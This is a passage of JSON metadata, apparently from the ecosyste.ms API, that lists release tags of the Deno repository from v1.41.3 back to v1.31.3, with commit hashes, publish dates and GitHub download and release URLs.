ositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/mani